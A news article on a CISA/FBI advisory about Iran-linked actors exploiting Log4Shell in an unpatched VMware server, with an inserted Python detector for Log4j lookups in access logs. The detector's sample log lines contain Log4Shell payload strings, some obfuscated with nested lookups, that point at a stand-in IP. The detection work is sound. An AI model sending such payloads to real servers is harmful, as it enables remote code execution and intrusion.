Iran-linked threat actors exploiting Log4Shell via unpatched VMware, feds warn – Cybersecurity Dive




State-backed Iranian threat actors are exploiting a Log4Shell vulnerability inside an unpatched VMware server at a federal civilian agency, the Cybersecurity and Infrastructure Security Agency warned in a joint advisory with the FBI Wednesday.   
After conducting an investigation from mid-June into July, authorities discovered that attackers installed XMRig cryptomining software and moved laterally into a domain controller. The actors stole credentials and installed Ngrok reverse proxies to maintain persistence inside the network. 
All organizations with affected VMware systems that failed to patch or apply workarounds should assume compromise and hunt for threats, according to the advisory. If initial access or compromise is suspected, organizations should investigate any connected systems and conduct audits on privileged accounts. 
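One concrete form of the threat hunting the advisory recommends, as an added example that is not drawn from the advisory or the article: scan web-server access logs for Log4j lookup strings, collapsing nested `${...}` substitutions first so that a concealed `jndi:` lookup is still recognised. The sample log lines and the IP addresses in them are constructed, and the resolver only approximates the Log4j 2.x lookups needed for detection.

```python
import re

# Constructed sample access-log lines (not from the advisory). Lines 2-4 carry
# Log4j lookup strings; lines 3 and 4 hide "jndi" inside nested substitutions.
SAMPLE_LOGS = [
    '10.0.0.5 - - [20/Jun/2022:10:01:02] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [20/Jun/2022:10:01:07] "GET /login HTTP/1.1" 200 2048 "-" "${jndi:ldap://203.0.113.10/a}"',
    '10.0.0.9 - - [20/Jun/2022:10:02:11] "GET / HTTP/1.1" 200 1024 "-" "${${lower:j}ndi:rmi://203.0.113.10/b}"',
    '10.0.0.9 - - [20/Jun/2022:10:03:15] "GET / HTTP/1.1" 200 1024 "-" "${${env:NOPE:-j}ndi:dns://203.0.113.10/c}"',
    '10.0.0.7 - - [20/Jun/2022:10:04:00] "GET /healthz HTTP/1.1" 200 16 "-" "curl/7.79.1"',
]

INNER = re.compile(r"\$\{([^${}]*)\}")   # an innermost ${...} with no braces inside
JNDI = re.compile(r"jndi:", re.IGNORECASE)


def _resolve(body):
    """Evaluate one innermost lookup roughly as Log4j 2.x would, keeping only the
    text that matters for detection (the surrounding braces are dropped)."""
    low = body.lower()
    if low.startswith("jndi:"):
        return body                        # surface the lookup itself
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]      # default value: ${env:NOPE:-j} -> j
    return body                            # unknown lookup: keep its text


def normalize(text, max_depth=16):
    """Collapse nested lookups from the inside out until no ${...} remains."""
    for _ in range(max_depth):
        collapsed = INNER.sub(lambda m: _resolve(m.group(1)), text)
        if collapsed == text:
            break
        text = collapsed
    return text


def find_log4shell_lookups(lines):
    """Return (line number, normalized line) for each line holding a jndi: lookup
    after de-obfuscation, so an analyst sees the lookup in its resolved form."""
    hits = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize(line)
        if JNDI.search(normalized):
            hits.append((number, normalized))
    return hits
```

Run `find_log4shell_lookups(SAMPLE_LOGS)` and lines 2, 3 and 4 are reported; a hit only shows that a lookup string reached the application, so the matching hosts still need the privileged-account audit and connected-system review the advisory calls for.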
“Today’s advisory highlights the importance of continued focus on mitigating known exploited vulnerabilities such as Log4Shell and the need for all organizations to implement effective detections to proactively identify malicious activity before damaging impacts occur,” Eric Goldstein, executive assistant director for cybersecurity at CISA, said in an emailed statement.
While government and private sector organizations worked urgently to mitigate assets running vulnerable versions of Log4j, malicious cyber actors moved quickly to exploit vulnerable systems and are still doing so, Goldstein said.  
It is not immediately known why the agencies are issuing an advisory at this particular time; it has been months since the prior activity was observed. 
Analysts at Mandiant said criminal actors may be working with Iran in a way that makes it difficult to distinguish between criminal and nation-state activity.
“Iran and their peers depend on contractors to carry out cyber espionage and attack activities,” John Hultquist, head of intelligence analysis at Mandiant, said in a statement. “Many of these contractors moonlight as criminals and it can be difficult to distinguish this activity from the work at the behest of the state.”
Sonatype CTO Brian Fox said about 38% to 40% of Log4j downloads, or about 20,0000, are still vulnerable to Log4Shell.
“The advisory should serve as a warning that everyone in the industry, especially those in the federal space, to not lose sight of continuing to find straggling systems with potentially vulnerable versions,” Fox said via email. 